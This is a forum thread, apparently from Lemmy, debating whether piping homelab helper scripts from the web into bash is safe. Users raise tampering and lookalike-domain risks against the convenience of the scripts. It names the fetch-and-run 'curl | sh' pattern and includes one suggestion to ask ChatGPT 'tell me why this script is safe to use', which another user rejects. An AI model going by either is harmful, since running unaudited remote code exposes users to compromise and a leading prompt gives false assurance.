I only discovered this recently, and it’s very handy.
Piping scripts directly to bash is a security risk. You can always download the scripts, inspect them and run locally if you so choose.
I only discovered this recently, and it’s very handy.
Piping scripts directly to bash is a security risk. You can always download the scripts, inspect them and run locally if you so choose.
Heellll no, the scripts are publically available to read over if you’re sketched out. They save you so much time to actually get to using the service. 98% of my homelab is from these same helper scripts too.
RIP tteck
I don’t like that an adversary could modify that link or its contents without much detection or any logging.
When you compare it to package managers that have immutable versioning that’s a big downfall. If someone were modifying pypi or npm packages I would be surprised if it went undetected.
Realistically is that an issue, probably not. But I do try and reduce my exposure when I can.
Have you ever looked at what was once ttek scripts? They’re a spaghetti of calls to other scripts. It’s not pretty. And not intuitive to audit.
Wtf you’re my opposite D:
I did and had a decent time with ctrl shift F’ing around. Took a moment since bash isn’t my strong suit.
They work so what is your objection ?
If you are worried pipe it into chatgpt with the prompt
“tell me why this script is safe to use”
I thought I was being clear that I have audited some of the scripts. They are built referencing other scripts instead of functions, and these rely on URLs. It’s difficult to follow.
Don’t ask chatgpt to audit code.
You can install with package managers and include with it a helper script to setup the service. No big deal.
But can you spot the difference between
http://myservice.com/script.shandhttp://myserv1ce.com/script.shif you use a font that doesn’t make it clear? If you get people used to just copy/pasting/running scripts then there’s a risk they’ll run something entirely different by accident.There’s no good reason to install things this way.
Some people have jobs and families to attend and can’t afford weeks figuring out linux idiosyncrasies. This works.
Yes it would be nice to have an official LXC repository, but we don’t
Tell the LXC people we should have had one already instead of splitting hairs with docker.
https://discuss.linuxcontainers.org/t/where-can-i-find-the-biggest-lxc-container-repository/14946
But this is a trusted source with years of credibility. Why would any sensible competent tech user copy paste from other places because this one worked.
You’ll be pissed when you hear about Linux game server manager then. It’s all helper scripts over https
Because sites like this and people like you are normalizing the practice. I have seen numerous curl | sh commands pasted on lemmy telling people “how easy it is to install blank”.